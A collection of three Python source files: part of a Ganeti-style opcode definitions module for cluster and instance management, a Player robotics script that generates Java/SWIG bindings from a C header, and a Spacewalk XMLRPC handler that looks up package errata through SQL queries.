instances from a node.""" OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, _PMigrationMode, _PMigrationLive, _PMigrationTargetNode, ("iallocator", None, ht.TMaybeString, "Iallocator for deciding the target node for shared-storage instances"), ] class OpNodeEvacStrategy(OpCode): """Compute the evacuation strategy for a list of nodes.""" OP_DSC_FIELD = "nodes" OP_PARAMS = [ ("nodes", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), None), ("remote_node", None, ht.TMaybeString, None), ("iallocator", None, ht.TMaybeString, None), ] # instance opcodes class OpInstanceCreate(OpCode): """Create an instance. @ivar instance_name: Instance name @ivar mode: Instance creation mode (one of L{constants.INSTANCE_CREATE_MODES}) @ivar source_handshake: Signed handshake from source (remote import only) @ivar source_x509_ca: Source X509 CA in PEM format (remote import only) @ivar source_instance_name: Previous name of instance (remote import only) @ivar source_shutdown_timeout: Shutdown timeout used for source instance (remote import only) """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForceVariant, _PWaitForSync, _PNameCheck, ("beparams", ht.EmptyDict, ht.TDict, "Backend parameters for instance"), ("disks", ht.NoDefault, # TODO: Generate check from constants.IDISK_PARAMS_TYPES ht.TListOf(ht.TDictOf(ht.TElemOf(constants.IDISK_PARAMS), ht.TOr(ht.TNonEmptyString, ht.TInt))), "Disk descriptions, for example ``[{\"%s\": 100}, {\"%s\": 5}]``;" " each disk definition must contain a ``%s`` value and" " can contain an optional ``%s`` value denoting the disk access mode" " (%s)" % (constants.IDISK_SIZE, constants.IDISK_SIZE, constants.IDISK_SIZE, constants.IDISK_MODE, " or ".join("``%s``" % i for i in sorted(constants.DISK_ACCESS_SET)))), ("disk_template", ht.NoDefault, _CheckDiskTemplate, "Disk template"), ("file_driver", None, ht.TOr(ht.TNone, ht.TElemOf(constants.FILE_DRIVER)), "Driver for file-backed disks"), ("file_storage_dir", None, ht.TMaybeString, "Directory for storing file-backed disks"), ("hvparams", ht.EmptyDict, ht.TDict, "Hypervisor parameters for instance, hypervisor-dependent"), ("hypervisor", None, ht.TMaybeString, "Hypervisor"), ("iallocator", None, ht.TMaybeString, "Iallocator for deciding which node(s) to use"), ("identify_defaults", False, ht.TBool, "Reset instance parameters to default if equal"), ("ip_check", True, ht.TBool, _PIpCheckDoc), ("mode", ht.NoDefault, ht.TElemOf(constants.INSTANCE_CREATE_MODES), "Instance creation mode"), ("nics", ht.NoDefault, ht.TListOf(_TestNicDef), "List of NIC (network interface) definitions, for example" " ``[{}, {}, {\"%s\": \"198.51.100.4\"}]``; each NIC definition can" " contain the optional values %s" % (constants.INIC_IP, ", ".join("``%s``" % i for i in sorted(constants.INIC_PARAMS)))), ("no_install", None, ht.TMaybeBool, "Do not install the OS (will disable automatic start)"), ("osparams", ht.EmptyDict, ht.TDict, "OS parameters for instance"), ("os_type", None, ht.TMaybeString, "Operating system"), ("pnode", None, ht.TMaybeString, "Primary node"), ("snode", None, ht.TMaybeString, "Secondary node"), ("source_handshake", None, ht.TOr(ht.TList, ht.TNone), "Signed handshake from source (remote import only)"), ("source_instance_name", None, ht.TMaybeString, "Source instance name (remote import only)"), ("source_shutdown_timeout", constants.DEFAULT_SHUTDOWN_TIMEOUT, ht.TPositiveInt, "How long source instance was given to shut down (remote import only)"), ("source_x509_ca", None, ht.TMaybeString, "Source X509 CA in PEM format (remote import only)"), ("src_node", None, ht.TMaybeString, "Source node for import"), ("src_path", None, ht.TMaybeString, "Source directory for import"), ("start", True, ht.TBool, "Whether to start instance after creation"), ("tags", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Instance tags"), ] class OpInstanceReinstall(OpCode): """Reinstall an instance's OS.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForceVariant, ("os_type", None, ht.TMaybeString, "Instance operating system"), ("osparams", None, ht.TMaybeDict, "Temporary OS parameters"), ] class OpInstanceRemove(OpCode): """Remove an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, ("ignore_failures", False, ht.TBool, "Whether to ignore failures during removal"), ] class OpInstanceRename(OpCode): """Rename an instance.""" OP_PARAMS = [ _PInstanceName, _PNameCheck, ("new_name", ht.NoDefault, ht.TNonEmptyString, "New instance name"), ("ip_check", False, ht.TBool, _PIpCheckDoc), ] class OpInstanceStartup(OpCode): """Startup an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForce, _PIgnoreOfflineNodes, ("hvparams", ht.EmptyDict, ht.TDict, "Temporary hypervisor parameters, hypervisor-dependent"), ("beparams", ht.EmptyDict, ht.TDict, "Temporary backend parameters"), _PNoRemember, ] class OpInstanceShutdown(OpCode): """Shutdown an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PIgnoreOfflineNodes, ("timeout", constants.DEFAULT_SHUTDOWN_TIMEOUT, ht.TPositiveInt, "How long to wait for instance to shut down"), _PNoRemember, ] class OpInstanceReboot(OpCode): """Reboot an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, ("ignore_secondaries", False, ht.TBool, "Whether to start the instance even if secondary disks are failing"), ("reboot_type", ht.NoDefault, ht.TElemOf(constants.REBOOT_TYPES), "How to reboot instance"), ] class OpInstanceReplaceDisks(OpCode): """Replace the disks of an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ("mode", ht.NoDefault, ht.TElemOf(constants.REPLACE_MODES), "Replacement mode"), ("disks", ht.EmptyList, ht.TListOf(ht.TPositiveInt), "Disk indexes"), ("remote_node", None, ht.TMaybeString, "New secondary node"), ("iallocator", None, ht.TMaybeString, "Iallocator for deciding new secondary node"), ("early_release", False, ht.TBool, "Whether to release locks as soon as possible"), ] class OpInstanceFailover(OpCode): """Failover an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, _PIgnoreConsistency, _PMigrationTargetNode, ("iallocator", None, ht.TMaybeString, "Iallocator for deciding the target node for shared-storage instances"), ] class OpInstanceMigrate(OpCode): """Migrate an instance. This migrates (without shutting down an instance) to its secondary node. @ivar instance_name: the name of the instance @ivar mode: the migration mode (live, non-live or None for auto) """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PMigrationMode, _PMigrationLive, _PMigrationTargetNode, ("cleanup", False, ht.TBool, "Whether a previously failed migration should be cleaned up"), ("iallocator", None, ht.TMaybeString, "Iallocator for deciding the target node for shared-storage instances"), ("allow_failover", False, ht.TBool, "Whether we can fallback to failover if migration is not possible"), ] class OpInstanceMove(OpCode): """Move an instance. This move (with shutting down an instance and data copying) to an arbitrary node. @ivar instance_name: the name of the instance @ivar target_node: the destination node """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, ("target_node", ht.NoDefault, ht.TNonEmptyString, "Target node"), _PIgnoreConsistency, ] class OpInstanceConsole(OpCode): """Connect to an instance's console.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName ] class OpInstanceActivateDisks(OpCode): """Activate an instance's disks.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ("ignore_size", False, ht.TBool, "Whether to ignore recorded size"), ] class OpInstanceDeactivateDisks(OpCode): """Deactivate an instance's disks.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForce, ] class OpInstanceRecreateDisks(OpCode): """Deactivate an instance's disks.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ("disks", ht.EmptyList, ht.TListOf(ht.TPositiveInt), "List of disk indexes"), ("nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "New instance nodes, if relocation is desired"), ] class OpInstanceQuery(OpCode): """Compute the list of instances.""" OP_PARAMS = [ _POutputFields, _PUseLocking, ("names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all instances, instance names otherwise"), ] class OpInstanceQueryData(OpCode): """Compute the run-time status of instances.""" OP_PARAMS = [ _PUseLocking, ("instances", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Instance names"), ("static", False, ht.TBool, "Whether to only return configuration data without querying" " nodes"), ] class OpInstanceSetParams(OpCode): """Change the parameters of an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForce, _PForceVariant, # TODO: Use _TestNicDef ("nics", ht.EmptyList, ht.TList, "List of NIC changes. Each item is of the form ``(op, settings)``." " ``op`` can be ``%s`` to add a new NIC with the specified settings," " ``%s`` to remove the last NIC or a number to modify the settings" " of the NIC with that index." % (constants.DDM_ADD, constants.DDM_REMOVE)), ("disks", ht.EmptyList, ht.TList, "List of disk changes. See ``nics``."), ("beparams", ht.EmptyDict, ht.TDict, "Per-instance backend parameters"), ("hvparams", ht.EmptyDict, ht.TDict, "Per-instance hypervisor parameters, hypervisor-dependent"), ("disk_template", None, ht.TOr(ht.TNone, _CheckDiskTemplate), "Disk template for instance"), ("remote_node", None, ht.TMaybeString, "Secondary node (used when changing disk template)"), ("os_name", None, ht.TMaybeString, "Change instance's OS name. Does not reinstall the instance."), ("osparams", None, ht.TMaybeDict, "Per-instance OS parameters"), ("wait_for_sync", True, ht.TBool, "Whether to wait for the disk to synchronize, when changing template"), ] class OpInstanceGrowDisk(OpCode): """Grow a disk of an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PWaitForSync, ("disk", ht.NoDefault, ht.TInt, "Disk index"), ("amount", ht.NoDefault, ht.TInt, "Amount of disk space to add (megabytes)"), ] # Node group opcodes class OpGroupAdd(OpCode): """Add a node group to the cluster.""" OP_DSC_FIELD = "group_name" OP_PARAMS = [ _PGroupName, _PNodeGroupAllocPolicy, _PGroupNodeParams, ] class OpGroupAssignNodes(OpCode): """Assign nodes to a node group.""" OP_DSC_FIELD = "group_name" OP_PARAMS = [ _PGroupName, _PForce, ("nodes", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), "List of nodes to assign"), ] class OpGroupQuery(OpCode): """Compute the list of node groups.""" OP_PARAMS = [ _POutputFields, ("names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all groups, group names otherwise"), ] class OpGroupSetParams(OpCode): """Change the parameters of a node group.""" OP_DSC_FIELD = "group_name" OP_PARAMS = [ _PGroupName, _PNodeGroupAllocPolicy, _PGroupNodeParams, ] class OpGroupRemove(OpCode): """Remove a node group from the cluster.""" OP_DSC_FIELD = "group_name" OP_PARAMS = [ _PGroupName, ] class OpGroupRename(OpCode): """Rename a node group in the cluster.""" OP_PARAMS = [ _PGroupName, ("new_name", ht.NoDefault, ht.TNonEmptyString, "New group name"), ] # OS opcodes class OpOsDiagnose(OpCode): """Compute the list of guest operating systems.""" OP_PARAMS = [ _POutputFields, ("names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Which operating systems to diagnose"), ] # Exports opcodes class OpBackupQuery(OpCode): """Compute the list of exported images.""" OP_PARAMS = [ _PUseLocking, ("nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all nodes, node names otherwise"), ] class OpBackupPrepare(OpCode): """Prepares an instance export. @ivar instance_name: Instance name @ivar mode: Export mode (one of L{constants.EXPORT_MODES}) """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ("mode", ht.NoDefault, ht.TElemOf(constants.EXPORT_MODES), "Export mode"), ] class OpBackupExport(OpCode): """Export an instance. For local exports, the export destination is the node name. For remote exports, the export destination is a list of tuples, each consisting of hostname/IP address, port, HMAC and HMAC salt. The HMAC is calculated using the cluster domain secret over the value "${index}:${hostname}:${port}". The destination X509 CA must be a signed certificate. @ivar mode: Export mode (one of L{constants.EXPORT_MODES}) @ivar target_node: Export destination @ivar x509_key_name: X509 key to use (remote export only) @ivar destination_x509_ca: Destination X509 CA in PEM format (remote export only) """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, # TODO: Rename target_node as it changes meaning for different export modes # (e.g. "destination") ("target_node", ht.NoDefault, ht.TOr(ht.TNonEmptyString, ht.TList), "Destination information, depends on export mode"), ("shutdown", True, ht.TBool, "Whether to shutdown instance before export"), ("remove_instance", False, ht.TBool, "Whether to remove instance after export"), ("ignore_remove_failures", False, ht.TBool, "Whether to ignore failures while removing instances"), ("mode", constants.EXPORT_MODE_LOCAL, ht.TElemOf(constants.EXPORT_MODES), "Export mode"), ("x509_key_name", None, ht.TOr(ht.TList, ht.TNone), "Name of X509 key (remote export only)"), ("destination_x509_ca", None, ht.TMaybeString, "Destination X509 CA (remote export only)"), ] class OpBackupRemove(OpCode): """Remove an instance's export.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ] # Tags opcodes class OpTagsGet(OpCode): """Returns the tags of the given object.""" OP_DSC_FIELD = "name" OP_PARAMS = [ _PTagKind, # Name is only meaningful for nodes and instances ("name", ht.NoDefault, ht.TMaybeString, None), ] class OpTagsSearch(OpCode): """Searches the tags in the cluster for a given pattern.""" OP_DSC_FIELD = "pattern" OP_PARAMS = [ ("pattern", ht.NoDefault, ht.TNonEmptyString, None), ] class OpTagsSet(OpCode): """Add a list of tags on a given object.""" OP_PARAMS = [ _PTagKind, _PTags, # Name is only meaningful for nodes and instances ("name", ht.NoDefault, ht.TMaybeString, None), ] class OpTagsDel(OpCode): """Remove a list of tags from a given object.""" OP_PARAMS = [ _PTagKind, _PTags, # Name is only meaningful for nodes and instances ("name", ht.NoDefault, ht.TMaybeString, None), ] # Test opcodes class OpTestDelay(OpCode): """Sleeps for a configured amount of time. This is used just for debugging and testing. Parameters: - duration: the time to sleep - on_master: if true, sleep on the master - on_nodes: list of nodes in which to sleep If the on_master parameter is true, it will execute a sleep on the master (before any node sleep). If the on_nodes list is not empty, it will sleep on those nodes (after the sleep on the master, if that is enabled). As an additional feature, the case of duration < 0 will be reported as an execution error, so this opcode can be used as a failure generator. The case of duration == 0 will not be treated specially. """ OP_DSC_FIELD = "duration" OP_PARAMS = [ ("duration", ht.NoDefault, ht.TFloat, None), ("on_master", True, ht.TBool, None), ("on_nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), None), ("repeat", 0, ht.TPositiveInt, None), ] class OpTestAllocator(OpCode): """Allocator framework testing. This opcode has two modes: - gather and return allocator input for a given mode (allocate new or replace secondary) and a given instance definition (direction 'in') - run a selected allocator for a given operation (as above) and return the allocator output (direction 'out') """ OP_DSC_FIELD = "allocator" OP_PARAMS = [ ("direction", ht.NoDefault, ht.TElemOf(constants.VALID_IALLOCATOR_DIRECTIONS), None), ("mode", ht.NoDefault, ht.TElemOf(constants.VALID_IALLOCATOR_MODES), None), ("name", ht.NoDefault, ht.TNonEmptyString, None), ("nics", ht.NoDefault, ht.TOr(ht.TNone, ht.TListOf( ht.TDictOf(ht.TElemOf([constants.INIC_MAC, constants.INIC_IP, "bridge"]), ht.TOr(ht.TNone, ht.TNonEmptyString)))), None), ("disks", ht.NoDefault, ht.TOr(ht.TNone, ht.TList), None), ("hypervisor", None, ht.TMaybeString, None), ("allocator", None, ht.TMaybeString, None), ("tags", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), None), ("memory", None, ht.TOr(ht.TNone, ht.TPositiveInt), None), ("vcpus", None, ht.TOr(ht.TNone, ht.TPositiveInt), None), ("os", None, ht.TMaybeString, None), ("disk_template", None, ht.TMaybeString, None), ("evac_nodes", None, ht.TOr(ht.TNone, ht.TListOf(ht.TNonEmptyString)), None), ("instances", None, ht.TOr(ht.TNone, ht.TListOf(ht.TNonEmptyString)), None), ("evac_mode", None, ht.TOr(ht.TNone, ht.TElemOf(constants.IALLOCATOR_NEVAC_MODES)), None), ("target_groups", None, ht.TOr(ht.TNone, ht.TListOf(ht.TNonEmptyString)), None), ] class OpTestJqueue(OpCode): """Utility opcode to test some aspects of the job queue. """ OP_PARAMS = [ ("notify_waitlock", False, ht.TBool, None), ("notify_exec", False, ht.TBool, None), ("log_messages", ht.EmptyList, ht.TListOf(ht.TString), None), ("fail", False, ht.TBool, None), ] class OpTestDummy(OpCode): """Utility opcode used by unittests. """ OP_PARAMS = [ ("result", ht.NoDefault, ht.NoType, None), ("messages", ht.NoDefault, ht.NoType, None), ("fail", ht.NoDefault, ht.NoType, None), ("submit_jobs", None, ht.NoType, None), ] WITH_LU = False def _GetOpList(): """Returns list of all defined opcodes. Does not eliminate duplicates by C{OP_ID}. """ return [v for v in globals().values() if (isinstance(v, type) and issubclass(v, OpCode) and hasattr(v, "OP_ID") and v is not OpCode)] OP_MAPPING = dict((v.OP_ID, v) for v in _GetOpList())
uml-robotics/player-2.1.3
libplayercore/bindings/java/parse.py
#!/usr/bin/env python import re import string import sys import os USAGE = 'USAGE: parse.y <player.h> <playercore_casts.i> <playercore_arraysofclasses.i> <Jplayercore> <playercore> <player.java>' if __name__ == '__main__': if len(sys.argv) != 7: print USAGE sys.exit(-1) infilename = sys.argv[1] outfilename = sys.argv[2] aofcfilename = sys.argv[3] outdir = sys.argv[4] pcoutdir = sys.argv[5] pcjfilename = sys.argv[6] os.system('mkdir -p ' + outdir) os.system('mkdir -p ' + pcoutdir) # Read in the entire file infile = open(infilename, 'r') instream = infile.read() infile.close() outfile = open(outfilename, 'w+') aofcfile = open(aofcfilename, 'w+') pcjfile = open(pcoutdir + '/' + pcjfilename, 'w+') # strip C++-style comments pattern = re.compile('//.*') instream = pattern.sub('', instream) # strip C-style comments pattern = re.compile('/\*.*?\*/', re.MULTILINE | re.DOTALL) instream = pattern.sub('', instream) # strip blank lines pattern = re.compile('^\s*?\n', re.MULTILINE) instream = pattern.sub('', instream) # find structs pattern = re.compile('typedef\s+struct\s+player_\w+[^}]+\}[^;]+', re.MULTILINE) structs = pattern.findall(instream) print 'Found ' + `len(structs)` + ' struct(s)' contentspattern = re.compile('.*\{\s*(.*?)\s*\}', re.MULTILINE | re.DOTALL) declpattern = re.compile('\s*([^;]*?;)', re.MULTILINE) typepattern = re.compile('\s*\S+') variablepattern = re.compile('\s*([^,;]+?)\s*[,;]') #arraypattern = re.compile('\[\s*(\w*?)\s*\]') arraypattern = re.compile('\[(.*?)\]') outfile.write('%inline\n%{\n\n') pcjfile.write('package net.sourceforge.playerstage.Jplayercore;\n') pcjfile.write('public class player {\n\n') for s in structs: # extract type of struct split = string.split(s) typename = split[-1] # pick out the contents of the struct varpart = contentspattern.findall(s) if len(varpart) != 1: print 'skipping nested / empty struct ' + typename continue # SWIG macro that lets us access arrays of this non-primitive type # as Java arrays aofcfile.write('JAVA_ARRAYSOFCLASSES(' + typename +')\n') buf_to_name = 'buf_to_' + typename buf_from_name = typename + '_to_buf' buf_to_Jname = 'buf_to_J' + typename buf_from_Jname = 'J' + typename + '_to_buf' sizeof_name = typename + '_sizeof' # function to return the size of the underlying C structure outfile.write('size_t ' + sizeof_name + '(void)\n') outfile.write('{\n') outfile.write(' return(sizeof(' + typename + '));\n') outfile.write('}\n') # JNI cast from a void* to a pointer to this type outfile.write(typename + '* ' + buf_to_name + '(void* buf)\n') outfile.write('{\n') outfile.write(' return((' + typename + '*)(buf));\n') outfile.write('}\n') # JNI cast from a pointer to this type to a void* outfile.write('void* ' + buf_from_name + '(' + typename + '* msg)\n') outfile.write('{\n') outfile.write(' return((void*)(msg));\n') outfile.write('}\n') # Equivalent non-JNI Java class jclass = 'J' + typename jfile = open(outdir + '/' + jclass + '.java', 'w+') jfile.write('package net.sourceforge.playerstage.Jplayercore;\n') jfile.write('import java.io.Serializable;\n') jfile.write('public class ' + jclass + ' implements Serializable {\n') jfile.write(' public final static long serialVersionUID = ' + `hash(s)` + 'L;\n') jclass_constructor = ' public ' + jclass + '() {\n'; # Static method in class player to convert from JNI Java object to # non-JNI java object pcj_data_to_jdata = '' pcj_data_to_jdata += ' public static ' + jclass + ' ' + typename + '_to_' + jclass + '(' + typename + ' data) {\n' pcj_data_to_jdata += ' ' + jclass + ' Jdata = new ' + jclass + '();\n' # Static method in class player to convert from non-JNI Java object to # JNI java object pcj_jdata_to_data = '' pcj_jdata_to_data += ' public static ' + typename + ' ' + jclass + '_to_' + typename + '(' + jclass + ' Jdata) {\n' pcj_jdata_to_data += ' ' + typename + ' data = new ' + typename + '();\n' # Static method in class playercore to convert from SWIGTYPE_p_void # to non-JNI Java object. pcjfile.write(' public static ' + jclass + ' ' + buf_to_Jname + '(SWIGTYPE_p_void buf) {\n') pcjfile.write(' ' + typename + ' data = playercore_java.' + buf_to_name + '(buf);\n') pcjfile.write(' return(' + typename + '_to_' + jclass + '(data));\n') pcjfile.write(' }\n\n') # Static method in class playercore to convert non-JNI Java object to # SWIGTYPE_p_void. pcjfile.write(' public static SWIGTYPE_p_void ' + buf_from_Jname + '(' + jclass + ' Jdata) {\n') pcjfile.write(' ' + typename + ' data = ' + jclass + '_to_' + typename + '(Jdata);\n') pcjfile.write(' return(playercore_java.' + buf_from_name + '(data));\n') pcjfile.write(' }\n\n') # separate the variable declarations decls = declpattern.finditer(varpart[0]) for d in decls: # find the type and variable names in this declaration dstring = d.string[d.start(1):d.end(1)] type = typepattern.findall(dstring)[0] dstring = typepattern.sub('', dstring, 1) vars = variablepattern.finditer(dstring) # Do some name mangling for common types builtin_type = 1 if type == 'int64_t': jtype = 'long' elif type == 'uint64_t': jtype = 'long' elif type == 'int32_t': jtype = 'int' elif type == 'uint32_t': jtype = 'long' elif type == 'int16_t': jtype = 'short' elif type == 'uint16_t': jtype = 'int' elif type == 'int8_t': jtype = 'byte' elif type == 'uint8_t': jtype = 'short' elif type == 'char': jtype = 'char' elif type == 'bool_t': jtype = 'boolean' elif type == 'double': jtype = 'double' elif type == 'float': jtype = 'float' else: # rely on a previous declaration of a J class for this type jtype = 'J' + type builtin_type = 0 # iterate through each variable for var in vars: varstring = var.string[var.start(1):var.end(1)] # is it an array or a scalar? arraysize = arraypattern.findall(varstring) if len(arraysize) > 0: arraysize = arraysize[0] varstring = arraypattern.sub('', varstring) if jtype == 'char': jfile.write(' public String ' + varstring + ';\n') else: jfile.write(' public ' + jtype + '[] ' + varstring + ';\n') #if builtin_type == 0: if jtype != 'char': if arraysize.isdigit(): jclass_constructor += ' ' + varstring + ' = new ' + jtype + '[' + arraysize + '];\n' else: jclass_constructor += ' ' + varstring + ' = new ' + jtype + '[playercore_javaConstants.' + arraysize + '];\n' else: arraysize = '' jfile.write(' public ' + jtype + ' ' + varstring + ';\n') if builtin_type == 0: jclass_constructor += ' ' + varstring + ' = new ' + jtype + '();\n' capvarstring = string.capitalize(varstring[0]) + varstring[1:] if builtin_type: pcj_data_to_jdata += ' Jdata.' + varstring + ' = data.get' + capvarstring + '();\n' pcj_jdata_to_data += ' data.set' + capvarstring + '(Jdata.' + varstring +');\n' else: if arraysize == '': pcj_data_to_jdata += ' Jdata.' + varstring + ' = ' + type + '_to_' + jtype + '(data.get' + capvarstring + '());\n' pcj_jdata_to_data += ' data.set' + capvarstring + '(' + jtype + '_to_' + type + '(Jdata.' + varstring + '));\n' else: try: asize = int(arraysize) except: arraysize = 'playercore_javaConstants.' + arraysize pcj_data_to_jdata += ' {\n' pcj_data_to_jdata += ' ' + type + ' foo[] = data.get' + capvarstring + '();\n' pcj_data_to_jdata += ' for(int i=0;i<' + arraysize + ';i++)\n' pcj_data_to_jdata += ' Jdata.' + varstring + '[i] = ' + type + '_to_' + jtype + '(foo[i]);\n' pcj_data_to_jdata += ' }\n' pcj_jdata_to_data += ' {\n' pcj_jdata_to_data += ' ' + type + ' foo[] = new ' + type + '[' + arraysize + '];\n' pcj_jdata_to_data += ' for(int i=0;i<' + arraysize + ';i++)\n' pcj_jdata_to_data += ' foo[i] = ' + jtype + '_to_' + type + '(Jdata.' + varstring + '[i]);\n' pcj_jdata_to_data += ' data.set' + capvarstring + '(foo);\n' pcj_jdata_to_data += ' }\n' pcj_data_to_jdata += ' return(Jdata);\n' pcj_data_to_jdata += ' }\n\n' pcjfile.write(pcj_data_to_jdata) pcj_jdata_to_data += ' return(data);\n' pcj_jdata_to_data += ' }\n\n' pcjfile.write(pcj_jdata_to_data) jclass_constructor += ' }\n' jfile.write(jclass_constructor) jfile.write('}\n') jfile.close() outfile.write('\n%}\n') outfile.close() pcjfile.write('\n}\n') pcjfile.close() aofcfile.close()
colloquium/spacewalk
backend/server/handlers/xmlrpc/errata.py
# # Copyright (c) 2008--2010 Red Hat, Inc. # # This software is licensed to you under the GNU General Public License, # version 2 (GPLv2). There is NO WARRANTY for this software, express or # implied, including the implied warranties of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2 # along with this software; if not, see # http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt. # # Red Hat trademarks are not licensed under GPLv2. No permission is # granted to use or replicate Red Hat trademarks that are incorporated # in this software or its documentation. # # Implements the errata.* functions for XMLRPC # # common modules imports from spacewalk.common.rhnTranslate import _ from spacewalk.common import rhnFault, rhnFlags, log_debug, log_error # server modules imports from spacewalk.server.rhnLib import parseRPMName from spacewalk.server.rhnHandler import rhnHandler from spacewalk.server import rhnSQL, rhnCapability class Errata(rhnHandler): """ Errata class --- retrieve (via xmlrpc) package errata. """ def __init__(self): rhnHandler.__init__(self) # Exposed Errata functions: self.functions = [] self.functions.append('GetByPackage') # Clients v1- self.functions.append('getPackageErratum') # Clients v2+ self.functions.append('getErrataInfo') # clients v2+ def GetByPackage(self, pkg, osRel): """ Clients v1- Get errata for a package given "n-v-r" format IN: pkg: "n-v-r" (old client call) or [n,v,r] osRel: OS release RET: a hash by errata that applies to this package (ie, newer packages are available). We also limit the scope for a particular osRel. """ if type(pkg) == type(''): # Old client support. pkg = parseRPMName(pkg) log_debug(1, pkg, osRel) # Stuff the action in the headers: transport = rhnFlags.get('outputTransportOptions') transport['X-RHN-Action'] = 'GetByPackage' # now look up the errata if type(pkg[0]) != type(''): log_error("Invalid package name: %s %s" % (type(pkg[0]), pkg[0])) raise rhnFault(30, _("Expected a package name, not: %s") % pkg[0]) #bug#186996:adding synopsis field to advisory info #client side changes are needed to access this data. h = rhnSQL.prepare(""" select distinct e.id errata_id, e.advisory_type errata_type, e.advisory advisory, e.topic topic, e.description description, e.synopsis synopsis from rhnErrata e, rhnPublicChannelFamily pcf, rhnChannelFamilyMembers cfm, rhnErrataPackage ep, rhnChannelPackage cp, rhnChannelErrata ce, rhnDistChannelMap dcm, rhnPackage p where 1=1 and p.name_id = LOOKUP_PACKAGE_NAME(:name) -- map to a channel and p.id = cp.package_id and cp.channel_id = dcm.channel_id and dcm.release = :dist -- map to an errata as well and p.id = ep.package_id and ep.errata_id = e.id -- the errata and the channel have to be linked and ce.channel_id = cp.channel_id -- and the channel has to be public and cp.channel_id = cfm.channel_id and cfm.channel_family_id = pcf.channel_family_id -- and get the erratum and e.id = ce.errata_id """) h.execute(name = pkg[0], dist = str(osRel)) ret = [] # sanitize the results for display in the clients while 1: row = h.fetchone_dict() if row is None: break for k in row.keys(): if row[k] is None: row[k] = "N/A" ret.append(row) return ret def getPackageErratum(self, system_id, pkg): """ Clients v2+ - Get errata for a package given [n,v,r,e,a,...] format Sing-along: You say erratum(sing), I say errata(pl)! :) IN: pkg: [n,v,r,e,s,a,ch,...] RET: a hash by errata that applies to this package """ log_debug(5, system_id, pkg) if type(pkg) != type([]) or len(pkg) < 7: log_error("Got invalid package specification: %s" % str(pkg)) raise rhnFault(30, _("Expected a package, not: %s") % pkg) # Authenticate and decode server id. self.auth_system(system_id) # log the entry log_debug(1, self.server_id, pkg) # Stuff the action in the headers: transport = rhnFlags.get('outputTransportOptions') transport['X-RHN-Action'] = 'getPackageErratum' name, ver, rel, epoch, arch, size, channel = pkg[:7] if epoch in ['', 'none', 'None']: epoch = None # XXX: also, should arch/size/channel ever be used? #bug#186996:adding synopsis field to errata info #client side changes are needed to access this data. h = rhnSQL.prepare(""" select distinct e.id errata_id, e.advisory_type errata_type, e.advisory advisory, e.topic topic, e.description description, e.synopsis synopsis from rhnServerChannel sc, rhnChannelPackage cp, rhnChannelErrata ce, rhnErrata e, rhnErrataPackage ep, rhnPackage p where p.name_id = LOOKUP_PACKAGE_NAME(:name) and p.evr_id = LOOKUP_EVR(:epoch, :ver, :rel) -- map to a channel and p.id = cp.package_id -- map to an errata as well and p.id = ep.package_id and ep.errata_id = e.id -- the errata and the channel have to be linked and e.id = ce.errata_id and ce.channel_id = cp.channel_id -- and the server has to be subscribed to the channel and cp.channel_id = sc.channel_id and sc.server_id = :server_id """) # " emacs sucks h.execute(name = name, ver = ver, rel = rel, epoch = epoch, server_id = str(self.server_id)) ret = [] # sanitize the results for display in the clients while 1: row = h.fetchone_dict() if row is None: break for k in row.keys(): if row[k] is None: row[k] = "N/A" ret.append(row) return ret # I don't trust this errata_id business, but chip says "trust me" def getErrataInfo(self, system_id, errata_id): log_debug(5, system_id, errata_id) # Authenticate the server certificate self.auth_system(system_id) # log this thing log_debug(1, self.server_id, errata_id) client_caps = rhnCapability.get_client_capabilities() log_debug(3,"Client Capabilities", client_caps) multiarch = 0 cap_info = None if client_caps and client_caps.has_key('packages.update'): cap_info = client_caps['packages.update'] if cap_info and cap_info['version'] > 1: multiarch = 1 statement = """ select distinct pn.name, pe.epoch, pe.version, pe.release, pa.label arch from rhnPackageName pn, rhnPackageEVR pe, rhnPackage p, rhnPackageArch pa, rhnChannelPackage cp, rhnServerChannel sc, rhnErrataPackage ep where ep.errata_id = :errata_id and ep.package_id = p.id and p.name_id = pn.id and p.evr_id = pe.id and p.package_arch_id = pa.id and sc.server_id = :server_id and sc.channel_id = cp.channel_id and cp.package_id = p.id """ h = rhnSQL.prepare(statement) 